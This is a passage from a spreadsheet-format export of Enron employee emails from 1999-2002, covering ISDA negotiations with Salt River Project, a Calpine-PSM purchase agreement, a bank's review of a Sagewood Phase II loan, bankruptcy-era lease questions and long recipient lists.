dperlin@enron_x000D_
713-853-7658_x000D_
713-646-3490 Fax_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 22 Aug 2001 12:44:01 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeff.dasovich@enron.com', 'david.parquet@enron.com'})</t>
  </si>
  <si>
    <t>Draft SCE QF Restructure presentation</t>
  </si>
  <si>
    <t>Gentlemen, attached is the latest draft of the proposal to restructure the SCE QFs.  As always your comments are welcome and appreciated._x000D_
_x000D_
 _x000D_
_x000D_
Michael Etringer_x000D_
West Power Origination_x000D_
Phone: 503-464-3836_x000D_
Cellular: 503-701-4516</t>
  </si>
  <si>
    <t>Fri, 19 Oct 2001 14:31:41 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: FW: Master purchase/sale agreement - Salt River</t>
  </si>
  <si>
    <t xml:space="preserve">Jay:  my mistake - Salt River did send a CSA (see below)  Sara_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Shackleton, Sara  _x000D_
Sent:	Friday, October 19, 2001 3:33 PM_x000D_
To:	Williams, Jason R (Credit)_x000D_
Subject:	FW: FW: Master purchase/sale agreement - Salt River_x000D_
_x000D_
Jay:  Per my ovice mail.  Sara_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Ward, Kim S (Houston)  _x000D_
Sent:	Monday, October 15, 2001 11:28 AM_x000D_
To:	Shackleton, Sara_x000D_
Cc:	Williams, Jason R (Credit)_x000D_
Subject:	RE: FW: Master purchase/sale agreement - Salt River_x000D_
_x000D_
Jay,  Can you send a credit worksheet to Sara for an ISDA for Salt River Project?  _x000D_
_x000D_
Sara, I am attaching the SRP documents.  _x000D_
_x000D_
Let me know if you guys need anything else.  What do you think the timing is on getting a credit worksheet together and a review of their docs?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kim_x000D_
_x000D_
 _x000D_
_x000D_
 _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Shackleton, Sara  _x000D_
Sent:	Monday, October 15, 2001 11:13 AM_x000D_
To:	Ward, Kim S (Houston)_x000D_
Cc:	Williams, Jason R (Credit); Ngo, Tracy_x000D_
Subject:	RE: FW: Master purchase/sale agreement - Salt River_x000D_
_x000D_
Kim:_x000D_
_x000D_
Legal and credit have never responded on this one since there was no activity.  We will have to do a comparison of the CP form.  We also need credit since nothing has happened since 1999._x000D_
_x000D_
Can you resend the email version which Salt River sent to you?_x000D_
_x000D_
Jay and/or Tracy:  Who will prepare credit?_x000D_
_x000D_
Thanks.  Sara_x000D_
_x000D_
Sara Shackleton_x000D_
Enron Wholesale Services_x000D_
1400 Smith Street, EB3801a_x000D_
Houston, TX  77002_x000D_
Ph:  (713) 853-5620_x000D_
Fax: (713) 646-3490_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Ward, Kim S (Houston)  _x000D_
Sent:	Monday, October 15, 2001 10:28 AM_x000D_
To:	Shackleton, Sara_x000D_
Subject:	FW: FW: Master purchase/sale agreement_x000D_
_x000D_
Sara,_x000D_
_x000D_
Mark Russell of Salt River Project sent me their ISDA documents last week.  Can we take a look at them and make the changes we would like to incorporate?  He called this morning and they are considering financial transactions with us.  Please give me a call and let me know where we stand with this when you get a chance.  If I should send it on to some one else.  Please let me know that as well._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kim_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	marussel@srpnet.com@ENRON [mailto:IMCEANOTES-marussel+40srpnet+2Ecom+40ENRON@ENRON.com] _x000D_
Sent:	Friday, October 05, 2001 4:12 PM_x000D_
To:	Ward, Kim S (Houston)_x000D_
Subject:	RE: FW: Master purchase/sale agreement_x000D_
_x000D_
I would like to begin working on an ISDA, I have attached our standard form_x000D_
schedule and CSA for your review.  I think this is a good window of_x000D_
opportunity._x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Kim.Ward@enron.com [mailto:Kim.Ward@enron.com]_x000D_
Sent: Thursday, April 05, 2001 9:13 AM_x000D_
To: marussel@srpnet.com_x000D_
Subject: Re: FW: Master purchase/sale agreement_x000D_
_x000D_
_x000D_
_x000D_
Mark,_x000D_
_x000D_
The best person to talk to about the ISDA is me.  I discussed an ISDA with_x000D_
Tim Roberts when I was in the Salt River offices on March 23rd.  A draft_x000D_
ISDA was sent to Bill Abraham on November 17, 1999.  I requested for a new_x000D_
legal review on 3/28/01.  Let me know if you need a new draft and I can_x000D_
send you or Tim a copy.  My number is 713-853-0685._x000D_
_x000D_
Thanks for your inquiry -_x000D_
_x000D_
Kim Ward_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
marussel@srpnet.com on 04/05/2001 08:20:15 AM_x000D_
_x000D_
To:   &lt;Kim.Ward@enron.com&gt;_x000D_
cc:   &lt;marussel@srpnet.com&gt;_x000D_
Subject:  FW: Master purchase/sale agreement_x000D_
_x000D_
_x000D_
I have been trying to get an ISDA going with Enron for several months. Who_x000D_
is the best contact to call?_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Kim.Ward@enron.com [mailto:Kim.Ward@enron.com]_x000D_
Sent: Friday, March 30, 2001 2:59 PM_x000D_
To: kaprice@srpnet.com_x000D_
Subject: Master purchase/sale agreement_x000D_
_x000D_
_x000D_
Kent,_x000D_
_x000D_
Attached is a draft copy of our Master Purchase/Sale Agreement for physical_x000D_
natural gas transactions.  As I mentioned before, we can enter into_x000D_
transactions for less that one year out.  However, for those outside of a_x000D_
year and for longer terms, we need to have a master in place.  Hopefully,_x000D_
we can get this one in place so that we will be prepared when/if we get_x000D_
ready to transact._x000D_
_x000D_
Let me know if you have any questions.  I will have our legal guys standing_x000D_
by to help, too._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kim Ward_x000D_
_x000D_
(See attached file: Master_NG_draft_contract.doc)_x000D_
_x000D_
_x000D_
(See attached file: Master_NG_draft_contract.doc)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - 070301.sample Paragraph13 credit annex isda.doc &lt;&lt; File: 070301.sample Paragraph13 credit annex isda.doc &gt;&gt; _x000D_
 - 062701.sample isda schedule.doc &lt;&lt; File: 062701.sample isda schedule.doc &gt;&gt; </t>
  </si>
  <si>
    <t>Fri, 19 Jan 2001 02:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>phone interview w/Nicholas O'Day -Nikkei,California</t>
  </si>
  <si>
    <t>Will be emailing briefing material on Thursday with contact number for you to _x000D_
call.</t>
  </si>
  <si>
    <t>Thu, 15 Feb 2001 12:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Tue, 5 Dec 2000 02:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: PSM Purchase Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Guys, can you come explain some of this to me including where we stand on the _x000D_
GE issues._x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 12/05/2000 _x000D_
10:12 AM ---------------------------_x000D_
_x000D_
_x000D_
"Churbuck" &lt;Churbuck@bellsouth.net&gt; on 12/05/2000 09:17:24 AM_x000D_
To: &lt;david.w.delainey@enron.com&gt;_x000D_
cc: "Mike J Miller" &lt;Mike.J.Miller@enron.com&gt;, "Michael L Miller" _x000D_
&lt;Michael.L.Miller@enron.com&gt; _x000D_
Subject: FW: PSM Purchase Agreement_x000D_
_x000D_
_x000D_
Dave - Attached are (2) documents relating to the Calpine acquisition of_x000D_
PSM. The draft stock purchase agreement and the Enron termination document._x000D_
I plan on closing Friday the 8th and would appreciate the warrant_x000D_
termination agreement to be executed by tomorrow to avoid delays in closing._x000D_
I will fax a copy of the warrant agreement on PSM letterhead later this_x000D_
morning. I appreciate all of your support and look forward to our further_x000D_
successes with Amp's. I will be in my office later this morning. Please keep_x000D_
information concerning our transaction Highly confidential._x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Tom Churbuck_x000D_
_x000D_
Office : 561-347-2408_x000D_
Cell:  : 561-213-5161_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Ambari Prakash [mailto:aprakash@thelenreid.com]_x000D_
Sent: Monday, December 04, 2000 9:04 PM_x000D_
To: tchurbuck@powermfg.com; vwesterhaus@shb.com; wpgarrett@yahoo.com_x000D_
Cc: dougw@calpine.com; jregnery@calpine.com; richardz@calpine.com;_x000D_
Ronf@calpine.com; Deborah DeMasi_x000D_
Subject: PSM Purchase Agreement_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&gt; ----------_x000D_
&gt; From:  Ambari Prakash[SMTP:APRAKASH@THELENREID.COM]_x000D_
&gt; Sent:  Monday, December 04, 2000 9:03:57 PM_x000D_
&gt; To:  tchurbuck@powermfg.com; vwesterhaus@shb.com; wpgarrett@yahoo.com_x000D_
&gt; Cc:  dougw@calpine.com; jregnery@calpine.com; richardz@calpine.com;_x000D_
Ronf@calpine.com; Deborah DeMasi_x000D_
&gt; Subject:  PSM Purchase Agreement_x000D_
&gt; Auto forwarded by a Rule_x000D_
&gt;_x000D_
========================================_x000D_
WARNING!  This electronic mail transmission is intended only for the_x000D_
addressee.  It contains information from the law firm of Thelen Reid &amp;_x000D_
Priest LLP which may be privileged, confidential and exempt from disclosure_x000D_
under applicable law.  Dissemination, distribution, or copying of this by_x000D_
anyone other than the addressee or the addressee's agent is strictly_x000D_
prohibited.  If this electronic mail transmission is received in error,_x000D_
please notify Thelen Reid &amp; Priest LLP immediately at 213-621-9800 (Los_x000D_
Angeles), 212-603-2000 (New York), 415-371-1200 (San Francisco, SOMA),_x000D_
415-538-9000 (San Francisco, South Park), 408-292-5800 (Silicon Valley),_x000D_
202-508-4000 (Washington, DC) or 973-644-3400 (Morristown, NJ)._x000D_
========================================_x000D_
_x000D_
_x000D_
 Please find attached a revised draft of the Calpine-PSM Mfg. Purchase_x000D_
Agreement, marked to show changes from the 11/20 draft._x000D_
_x000D_
In the interests of time, this draft is being circulated simultaneoulsy to_x000D_
Calpine for review, and remains subject to further revisions._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Ambari Prakash_x000D_
Thelen Reid &amp; Priest_x000D_
Washington, DC 20004_x000D_
_x000D_
Main Tel:  202-508-4000_x000D_
Dir. Dial:   202-508-4021_x000D_
Fascimile: 202-508-4321_x000D_
aprakash@thelenreid.com_x000D_
www.thelenreid.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - 24_QRED.DOC_x000D_
 - WarrantT.DOC_x000D_
</t>
  </si>
  <si>
    <t>Tue, 13 Feb 2001 07:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>North Coast CA</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the bilateral form of CA._x000D_
</t>
  </si>
  <si>
    <t>Thu, 8 Mar 2001 05:33:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Sagewood Phase II</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Phillip K Allen/HOU/ECT on 03/08/2001 _x000D_
01:32 PM ---------------------------_x000D_
_x000D_
_x000D_
Andrew_M_Ozuna@bankone.com on 03/07/2001 11:41:43 AM_x000D_
To: Phillip.K.Allen@enron.com_x000D_
cc:  _x000D_
Subject: Sagewood Phase II_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Andrew M Ozuna/TX/BANCONE on 03/07/2001_x000D_
01:41 PM ---------------------------_x000D_
_x000D_
_x000D_
Andrew M Ozuna_x000D_
03/06/2001 03:14 PM_x000D_
_x000D_
To:   "George Richards" &lt;cbpres@austin.rr.com&gt;_x000D_
cc:_x000D_
Subject:  Sagewood Phase II_x000D_
_x000D_
_x000D_
George,_x000D_
_x000D_
Thank you for the opportunity to review your financing request for the _x000D_
Sagewood_x000D_
Phase II project.  Upon receipt of all the requested information regarding the_x000D_
project, we completed somewhat of a due diligence on the market.  There are a_x000D_
number of concerns which need to be addressed prior to the Bank moving forward_x000D_
on the transaction.  First, the pro-forma rental rates, when compared on a_x000D_
Bedroom to Bedroom basis, are high relative to the market.   We adjusted_x000D_
pro-forma downward to match the market rates and the rates per bedroom we are_x000D_
acheiving on the existing Sagewood project.  Additionally, there are about _x000D_
500+_x000D_
units coming on-line within the next 12 months in the City of San Marcos, _x000D_
this,_x000D_
we believe will causes some downward rent pressures which can have a serious_x000D_
effect on an over leveraged project.  We have therefore adjusted the requested_x000D_
loan amount to $8,868,000._x000D_
_x000D_
I have summarized our issues as follows:_x000D_
_x000D_
1.  Pro-forma rental rates were adjusted downward to market as follows:_x000D_
_x000D_
     Pro-Forma                           Bank's Adjustment_x000D_
     Unit           Unit Rent Rent/BR    Unit Rent      Rent/BR_x000D_
     2 BR/2.5 BA         $1,150          $575           $950           $475_x000D_
     3 BR/Unit      $1,530         $510       $1,250         $417_x000D_
_x000D_
2.  Pro-forma expenses were increased to include a $350/unit reserve for unit_x000D_
turn over._x000D_
_x000D_
3.  A market vacancy factor of 5% was applied to Potential Gross Income (PGI)._x000D_
_x000D_
4.  Based on the Bank's revised N.O.I. of $1,075,000, the project can support_x000D_
debt in the amount of $8,868,000, and maintain our loan parameters of 1.25x _x000D_
debt_x000D_
coverage ratio, on a 25 year amo., and 8.60% phantom interest rate._x000D_
_x000D_
5.  The debt service will be approx. $874,000/year._x000D_
_x000D_
6.  Given the debt of $8,868,000, the Borrower will be required to provide_x000D_
equity of $2,956,000, consisting of the following:_x000D_
_x000D_
     Land -                   $1,121,670_x000D_
     Deferred profit&amp; Overhead     $    415,000_x000D_
     Cash Equity              $1,419,268_x000D_
     Total                    $2,955,938_x000D_
_x000D_
7. Equity credit for deferred profit and overhead was limited to a percentage _x000D_
of_x000D_
actual hard construction costs._x000D_
_x000D_
(See attached file: MAPTTRA.xls)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - MAPTTRA.xls_x000D_
</t>
  </si>
  <si>
    <t>Thu, 6 Dec 2001 18:26:22 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Remote Office Lease Payments</t>
  </si>
  <si>
    <t>Come and see me tomorrow._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Shepperd, Tammy R.  _x000D_
Sent:	Thursday, December 06, 2001 1:54 PM_x000D_
To:	Kitchen, Louise_x000D_
Subject:	Remote Office Lease Payments_x000D_
_x000D_
Louise, _x000D_
Enron Property has asked me to validate whether some of the remote office leases should be paid for January.  I have been unable to get an answer about the Denver office.  Will you please advise?_x000D_
_x000D_
We will still be able to reject the lease even if we pay the January rent, if we do so by Feb. 2 under the bankruptcy rules._x000D_
_x000D_
Thank you, _x000D_
Tammy</t>
  </si>
  <si>
    <t>Wed, 29 Dec 1999 02:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Valero 8018 and 1394</t>
  </si>
  <si>
    <t xml:space="preserve">Gary,_x000D_
What is the status of this?_x000D_
HC_x000D_
---------------------- Forwarded by Howard B Camp/HOU/ECT on 12/29/99 10:06 _x000D_
AM ---------------------------_x000D_
Kenneth Seaman   12/21/99 01:02 PM_x000D_
_x000D_
To: Gary W Lamphier/HOU/ECT@ECT, Howard B Camp/HOU/ECT@ECT, Joanie H _x000D_
Ngo/HOU/ECT@ECT, Robert E Lloyd/HOU/ECT@ECT_x000D_
cc: Daren J Farmer/HOU/ECT@ECT _x000D_
Subject: Valero 8018 and 1394_x000D_
_x000D_
It is my understanding the outages Valero incurred at the above locations are _x000D_
force majure situations during December and should not trigger the buyback _x000D_
feature of the contract._x000D_
_x000D_
Gary, I have not seen any documentation of this from Valero. Please follow up _x000D_
with your counterpart to secure the letter of notice or we will need to _x000D_
process the deal as if the buyback is active._x000D_
_x000D_
Thanks _x000D_
_x000D_
Ken_x000D_
</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 11:53:55 -0800 (PST)</t>
  </si>
  <si>
    <t>Happy Thanksgiving</t>
  </si>
  <si>
    <t>I just wanted to sincerely wish all of you a very happy and safe_x000D_
Thanksgiving with your families._x000D_
_x000D_
Thanks to all of you for helping me build my business this year._x000D_
_x000D_
--------------------------_x000D_
Carol Measom_x000D_
Tom James Company of Houston_x000D_
4605 Post Oak Place Drive, #200_x000D_
Houston, Texas 77027_x000D_
713.622.5678, ext 124_x000D_
www.tomjamesco.com_x000D_
_x000D_
Learn more about me at:_x000D_
http://www.tomjames.com/asp/biopage.asp?empidn=05568</t>
  </si>
  <si>
    <t>Mon, 8 Apr 2002 08:44:14 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'julie.kearney@enron.com', 'mo.elafandi@enron.com', 'susan.rance@enron.com', 'm..driscoll@enron.com', 'don.hammond@enron.com', 'virginia.thompson@enron.com', 'lisa.gang@enron.com', 'stan.gray@enron.com', 'gordon.savage@enron.com', 'wayne.mays@enron.com', 'samuel.wehn@enron.com', 'paul.kaufman@enron.com', 'kathryn.sheppard@enron.com', 'paul.kane@enron.com', 'caroline.emmert@enron.com', 'jim.gilbert@enron.com', 'bill.williams@enron.com', "p..o'neil@enron.com", 'mark.fillinger@enron.com', 'julie.sarnowski@enron.com', 'robert.anderson@enron.com', 'g..slaughter@enron.com', 'ryan.deane@enron.com', 'jody.blackburn@enron.com', 'fredrik.eriksson@enron.com', 'dean.russell@enron.com', 'matt.motley@enron.com', 'david.parquet@enron.com', 'kenton.erwin@enron.com', 'grace.rodriguez@enron.com', 'april.hrach@enron.com', 'darren.cavanaugh@enron.com', 'kelly.brodbeck@enron.com'})</t>
  </si>
  <si>
    <t>All Employee Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
The All-Employee Meeting is scheduled for Thursday, April 11 at 8:30 AM (Central).  Portland employees will be able to view the meeting, in it's entirety, from the Intranet through home.enron.com.  The link will be made available almost immediately following the meeting.  _x000D_
_x000D_
Further information on how to access the Intranet link will be provided within the next few days.  If you have any questions, please let us know.  _x000D_
_x000D_
Thank you,_x000D_
ENA HR _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 28 Oct 2001 14:52:23 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: ExpansionSummary 10-11-01</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
-----Original Message-----_x000D_
From: Polsky, Phil _x000D_
Sent: Tuesday, October 23, 2001 6:20 PM_x000D_
To: Grigsby, Mike_x000D_
Subject: ExpansionSummary 10-11-01_x000D_
_x000D_
_x000D_
Here is the raw data file.  _x000D_
 _x000D_
 ExpansionSummary 10-11-01</t>
  </si>
  <si>
    <t>Sat, 2 Jun 2001 12:36:25 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jacqueline.coleman@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'e-mail &lt;.shirley@enron.com&gt;', 'c.reyes@enron.com', 'andres.balmaceda@enron.com', 'nadege.assale@enron.com', 'colleen.koenig@enron.com', 'vinay.adenwala@enron.com', 'e-mail &lt;.daniel@enron.com&gt;', 'russell.dyk@enron.com', 'jay.reitmeyer@enron.com', 'pearce.hammond@enron.com', 'sebastien.saubier@enron.com', 'ivan.donaldson@enron.com', 'e-mail &lt;.james@enron.com&gt;', 'shilpa.chunchu@enron.com', 'eric.dixon@enron.com', 'rob.wheeler@enron.com', 'gillian.johnson@enron.com', 'jonathan.anderson@enron.com', 'denver.plachy@enron.com', 'seung-taek.oh@enron.com', 'e-mail &lt;.david@enron.com&gt;', 'nadia.herb@enron.com', 'jun.wang@enron.com', 'christiaan.huizer@enron.com', 'michael.nguyen@enron.com', 'e-mail &lt;.roman@enron.com&gt;', 'e-mail &lt;.enrique@enron.com&gt;', 'kelli.little@enron.com', 'laquesha.dillingham@enron.com', 'joseph.wagner@enron.com', 'matthew.frank@enron.com', 'e..kelly@enron.com', 'e-mail &lt;.mary@enron.com&gt;', 'victoria.versen@enron.com', 'e-mail &lt;.ryan@enron.com&gt;', 'selena.gonzalez@enron.com', 'benjamin.thomason@enron.com', 'e-mail &lt;.kendell@enron.com&gt;', 'e-mail &lt;.charles@enron.com&gt;', 'mauricio.mora@enron.com', 'virawan.yawapongsiri@enron.com', 'russell.parks@enron.com', 'heath.kendall@enron.com', 'alberto.olimon@enron.com', 'eric.rhodes@enron.com', 'tara.piazze@enron.com', 'm.palczer@enron.com', 'jim.pyke@enron.com', 'biliana.pehlivanova@enron.com', 'russell.ballato@enron.com', 'm.shulklapper@enron.com', 'andy.chen@enron.com', 'joseph.piotrowski@enron.com', 'e-mail &lt;.gerardo@enron.com&gt;', 'blake.swanson@enron.com', 'e-mail &lt;.bora@enron.com&gt;', 'fredrik.eriksson@enron.com', 'christopher.lovisone@enron.com', 'e-mail &lt;.peter@enron.com&gt;', 'e-mail &lt;.juan@enron.com&gt;', 'e-mail &lt;.henry@enron.com&gt;', 'e-mail &lt;.lauren@enron.com&gt;', 'scott.griffin@enron.com', 'brandon.cavazos@enron.com', 'lisa.gillette@enron.com', 'e.vasquez@enron.com', 'e-mail &lt;.kiavash@enron.com&gt;', 'christine.milliner@enron.com', 'e-mail &lt;.justyn@enron.com&gt;', 'e-mail &lt;.melanie@enron.com&gt;', 'george.breen@enron.com', 'stanton.ray@enron.com', 'arvindh.kumar@enron.com', 'aarati.sivasubramanian@enron.com', 'e-mail &lt;.brian@enron.com&gt;', 'bryan.hull@enron.com', 'e-mail &lt;.zachary@enron.com&gt;', 'george.huan@enron.com', 'gulay.soykok@enron.com', 'anne.beylin@enron.com', 'avinash.jain@enron.com', 'rousseau.anai@enron.com', 'inderpal.singh@enron.com', 'toby.rogers@enron.com', 'michael.olsen@enron.com', 'jennifer.bagwell@enron.com', 'marina.titova@enron.com', 'e-mail &lt;.geir@enron.com&gt;', 'savithri.hospeti@enron.com', 'ethan.schultz@enron.com', 'e-mail &lt;.grant@enron.com&gt;', 'e-mail &lt;.datren@enron.com&gt;', 'jody.crook@enron.com', 's.chettiar@enron.com', 'eric.feitler@enron.com', 't.hoskins@enron.com', 'jim.cole@enron.com', 'rajneesh.salhotra@enron.com', 'e-mail &lt;.steinunn@enron.com&gt;', 'e-mail &lt;.murlidhar@enron.com&gt;', 'john.kiani-aslani@enron.com', 'david.lekach@enron.com', 'e-mail &lt;.akasha@enron.com&gt;', 'olumide.akanni-owoo@enron.com', 'zachary.sampson@enron.com', 'jennifer.mcquade@enron.com', 'sabina.rank@enron.com', 'y.choi@enron.com', 'jennifer.thome@enron.com', 'jeffrey.snyder@enron.com', 'majed.limam@enron.com', 'e-mail &lt;.sarah@enron.com&gt;', 'merrill.barlow@enron.com', 'e-mail &lt;.samantha@enron.com&gt;', 'e-mail &lt;.marcus@enron.com&gt;', 'jordan.marye@enron.com', 'ryan.deane@enron.com', 'sanchayita.ray@enron.com', 'ajay.jagsi@enron.com', 'cooper.richey@enron.com', 'e-mail &lt;.harry@enron.com&gt;', 'tobin.carlson@enron.com', 'douglas.seaworth@enron.com', 'andre.white@enron.com', 'julie.ferrara@enron.com', 'edmund.gaither@enron.com', 'william.st.@enron.com', 'steve.jacobellis@enron.com', 'e-mail &lt;.escueta@enron.com&gt;', 'valter.stoiani@enron.com', 'e-mail &lt;.darren@enron.com&gt;', 'e-mail &lt;.millie@enron.com&gt;', 'stephanie.segura@enron.com', 'courtney.mcmillian@enron.com', 's..lee@enron.com', 'c.will@enron.com', 'e-mail &lt;.reagan@enron.com&gt;', 'roberto.conterno@enron.com', 'zal.masani@enron.com', 'gabriel.chavez@enron.com', 'e-mail &lt;.ted@enron.com&gt;', 'john.howton@enron.com', 'gregory.smolar@enron.com', 'maria.hernandez@enron.com', 'gabriel.gonzalez@enron.com', 'erwin.landivar@enron.com', 'e-mail &lt;.raul@enron.com&gt;', 'e-mail &lt;.mark@enron.com&gt;', 'li.sun@enron.com', 'adam.siegel@enron.com', 'monique.sanchez@enron.com', 'c.womble@enron.com', 'vladi.pimenov@enron.com', 'brad.jones@enron.com', 'steve.gim@enron.com', 'maria.arefieva@enron.com', 'e-mail &lt;.jerald@enron.com&gt;', 'crystal.hyde@enron.com', 'karen.herrmann@enron.com', 'derrick.ross@enron.com', 'e-mail &lt;.petual@enron.com&gt;', 'j..wolfe@enron.com', 'kenneth.oliva@enron.com', 'n.shah@enron.com', 'e-mail &lt;.jeremy@enron.com&gt;', 'e-mail &lt;.eric@enron.com&gt;', 'brian.kolle@enron.com', 'e-mail &lt;.dorothy@enron.com&gt;', 'e-mail &lt;.sean@enron.com&gt;', 'e-mail &lt;.julie@enron.com&gt;', 'anthony.moon@enron.com', 'robert.fuller@enron.com', 'j.pinckney@enron.com', 'david.junus@enron.com', 'e-mail &lt;.adrian@enron.com&gt;', 'ashley.deiter@enron.com', 'g.marks@enron.com', 'erin.willis@enron.com', 'e-mail &lt;.marilyn@enron.com&gt;', 'peter.bennett@enron.com', 'carlos.paysse@enron.com', 'catherine.clark@enron.com', 'nathan.creech@enron.com', 'sam.enochian@enron.com', 'chris.jantz@enron.com', 'philip.mayor@enron.com', 'e-mail &lt;.gabriel@enron.com&gt;', 'maria.tefel@enron.com', 'christopher.watts@enron.com', 'scott.baukney@enron.com', 'e-mail &lt;.regan@enron.com&gt;', 'richard.lassander@enron.com', 'e-mail &lt;.reginald@enron.com&gt;', 'israel.estrada@enron.com', 'jason.morris@enron.com', 'naveed.ahmed@enron.com', 'eduardo.gil@enron.com', 'chuchu.wang@enron.com', 'e.shim@enron.com', 'y.compean@enron.com', 'e-mail &lt;.philip@enron.com&gt;', 'e-mail &lt;.margarita@enron.com&gt;', 'daniel.kang@enron.com', 'sheetal.patel@enron.com', 'fernando.herrera@enron.com', 'e.vicens@enron.com', 'p.jachimiak@enron.com', 'neel.broker@enron.com', 'moises.benchluch@enron.com', 'john.weakly@enron.com', 'e-mail &lt;.christopher@enron.com&gt;', 'jeremy.morris@enron.com', 'erika.breen@enron.com', 'binh.pham@enron.com', 'elberg.gelin@enron.com', 'e-mail &lt;.santiago@enron.com&gt;', 'courtney.gibbs@enron.com', 'joe.gordon@enron.com', 'e-mail &lt;.neithard@enron.com&gt;', 'holden.salisbury@enron.com', 'k.gross@enron.com', 'kristin.quinn@enron.com', 'ibrahim.qureishi@enron.com', 'd.luna@enron.com', 'michael.finger@enron.com', 'fatimata.liamidi@enron.com', 'sachin.gandhi@enron.com', 'chad.pennix@enron.com', 'mark.schlueter@enron.com', 'k..kuykendall@enron.com', 'a..katz@enron.com', 'holly.nelson@enron.com', 'e-mail &lt;.duc@enron.com&gt;', 'jason.wolfe@enron.com', 'vikas.dwivedi@enron.com', 'felipe.jens@enron.com', 'elizabeth.johnston@enron.com', 'charles.weldon@enron.com', 'e-mail &lt;.ursula@enron.com&gt;', 'e-mail &lt;.jin@enron.com&gt;', 'vivek.shah@enron.com', 'jacob.shupe@enron.com', 'nelson.wu@enron.com', 'jason.jenkins@enron.com', 'loftus.fitzwater@enron.com', 'christy.wussow@enron.com', 'dutch.quigley@enron.com', 'justin.rostant@enron.com', 'ryan.taylor@enron.com', 'm.smith@enron.com', 'steven.leung@enron.com', 'monika.causholli@enron.com', 'shiraz.rehman@enron.com', 'e-mail &lt;.homer@enron.com&gt;', 'erin.rice@enron.com', 'reese.trejo@enron.com', 'juan.cabrales@enron.com', 'e-mail &lt;.luis@enron.com&gt;', 'amanda.day@enron.com', 'cybele.henriquez@enron.com', 'andrew.moth@enron.com', 'justin.cornett@enron.com', 'veronica.hill@enron.com', 'e-mail &lt;.zeina@enron.com&gt;', 'russell.kelley@enron.com', 'kelley.mcintyre@enron.com', 'ebony.watts@enron.com', 'simon.yeung@enron.com', 'a.ashmore@enron.com', 'mitra.mujica@enron.com', 'daniel.falcone@enron.com', 'leah.stephens@enron.com', 'e-mail &lt;.jason@enron.com&gt;', 'luis.mena@enron.com', 'chris.mallory@enron.com', 'adam.pollock@enron.com', 'banu.ozcan@enron.com', 'm..fenner@enron.com', 'e-mail &lt;.simone@enron.com&gt;', 'cathy.wang@enron.com', 'amanda.schultz@enron.com', 'e-mail &lt;.william@enron.com&gt;', 'e-mail &lt;.danielle@enron.com&gt;', 'felipe.ospina@enron.com', 'aamir.maniar@enron.com', 'martin..gonzalez@enron.com', 'e-mail &lt;.shaleen@enron.com&gt;', 'e-mail &lt;.marc@enron.com&gt;', 'robert.rosa@enron.com', 'mo.bawa@enron.com', 'jennifer.reimer@enron.com', 'e-mail &lt;.brad@enron.com&gt;', 'mog.heu@enron.com', 'bilal.bajwa@enron.com', 'e-mail &lt;.jonathan@enron.com&gt;', 'a..summerford@enron.com', 'ethel.koskas@enron.com', 'e-mail &lt;.vikram@enron.com&gt;', 'brad.guilmino@enron.com', 'kyu-bong.lee@enron.com', 'vikram.singh@enron.com', 'benjamin.woods@enron.com', 'sarah.mulholland@enron.com', 'kyriakos.frantzeskakis@enron.com', 'amie.ha@enron.com', 'mason.hamlin@enron.com', 'teresa.dyar@enron.com', 'e-mail &lt;.mohsin@enron.com&gt;', 'e-mail &lt;.elizabeth@enron.com&gt;', 'e..bernard@enron.com', 'a..johnson@enron.com', 'e-mail &lt;.hector@enron.com&gt;', 'carlos.alatorre@enron.com', 'j..brancaccio@enron.com', 'e-mail &lt;.jodi@enron.com&gt;', 'paul.schiavone@enron.com', 'juan.padron@enron.com', 'e-mail &lt;.ace@enron.com&gt;', 'sanjay.patel@enron.com', 'andrew.kandolha@enron.com', 'e-mail &lt;.jennifer@enron.com&gt;', 'eboni.troupe@enron.com', 'f.li@enron.com', 'olalekan.oladeji@enron.com', 'e-mail &lt;.micah@enron.com&gt;', 'bart.burk@enron.com', 'roberto.martinez@enron.com', 'lino.mastrangelo@enron.com', 'michael.croffie@enron.com', 'james.bakondy@enron.com', 'e-mail &lt;.benjamin@enron.com&gt;', 'noha.kasrawi@enron.com', 'roshena.ham@enron.com', 'gisselle.rohmer@enron.com', 'jebong.lee@enron.com', 'e-mail 